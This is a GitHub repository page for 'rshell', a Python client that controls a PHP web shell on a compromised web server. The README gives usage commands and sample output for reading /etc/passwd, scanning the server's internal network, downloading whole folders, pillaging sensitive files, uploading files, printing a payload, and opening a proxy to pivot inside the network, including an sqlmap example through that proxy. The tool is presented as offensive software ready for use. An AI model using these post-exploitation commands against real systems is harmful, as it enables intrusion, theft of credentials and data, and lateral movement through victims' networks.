Skip to content

unanono/rshell

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

56 Commits

LICENSE

LICENSE

 
 

README.md

README.md

 
 

pillage.lst

pillage.lst

 
 

proxy.py

proxy.py

 
 

request.py

request.py

 
 

rshell.py

rshell.py

 
 

rshell_core.py

rshell_core.py

 
 

sh.php

sh.php

 
 

utils.py

utils.py

 
 

Repository files navigation

rshell

Interactive command line interpreter using a web shell

###Usage: python rshell.py -u shell_url [-p proxy:port] ####Examples: * python rshell.py -u http://127.0.0.1/shell.php

	#Get the ips assigned to the server interfaces
	rshell:~ get_local_ips
	{'127.0.0.1': {'mask_bits': 8}, '192.168.1.8': {'mask_bits': 24}}

	#Find hosts in the server internal network
	rshell:~ find_hosts

	IP: 192.168.1.3
	Host name: 

	IP: 192.168.1.2
	Host name: 
	 
	IP: 192.168.1.1
	Host name: 
	23/tcp    open  telnet
	53/tcp    open  domain
	80/tcp    open  http
	52869/tcp open  unknown
	 
	IP: 192.168.1.8
	Host name: 
	22/tcp  open  ssh
	80/tcp  open  http
	111/tcp open  rpcbind
	139/tcp open  netbios-ssn
	445/tcp open  microsoft-ds

	#Run a command on the server side
	rshell:~ cat /etc/passwd

	#Run a command on the client side
	rshell:~ !command_in_client_side

	#Compress and download a folder
	rshell:~ dwfolder /var/www/html

	#Start a proxy to pivot to the internal network
	#You have to configure your browser proxy settings to localhost:8888
	rshell:~ start_proxy

* python rshell.py -u http://127.0.0.1/shell.php -p proxy:port

###Functionality - check_files Check existence of some files extracted from pillage.lst from pwnwiki (https://github.com/pwnwiki) usage: check_files - compress_folder Compress a folder in the the server usage: dwfolder compressed_file_name - download Download a file from the server usage: download remote_path/remote_file local_path/local_file - dwfolder Compress and download a entire folder from the server usage: dwfolder folder_path - exit This is the exit command - find_hosts Find hosts on local network usage: find_hosts - get_local_ips Get ips assigned to the local interfaces usage: get_local_ips - get_os Get information about the operating system using php usage: get_os - getswversion Print some software versions usage: getswversion - getsysinfo Print user and system information usage: getsysinfo - help This command show the list of commands - payload Print the payload to write in an executable file in the server - phpinfo Extract the phpinfo result and open it in a web browser - print_hosts Print the hosts finded whith the command find_hosts usage: print_hosts - print_local_ips Print local ips usage: print_local_ips - quit This is the exit command - set_password

 - shell 
    	This method execute the command locally
 - sql_connect

 - start_proxy 
    	Start a local http proxy server to surf the internal network
	Or you can use it with sqlmap (./sqlmap.py -u "http://192.168.32.15/cat.php?id=1" --proxy=http://127.0.0.1:8888 --current-user)
        usage: start_proxy
 - stop_proxy 
    	Stop the proxy server
        usage: stop_proxy
 - upload 
    	Upload a file to the server
        usage: upload local_path/local_file remote_path/remote_file

About

Remote web shell

Resources

Readme

License

GPL-3.0 license
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages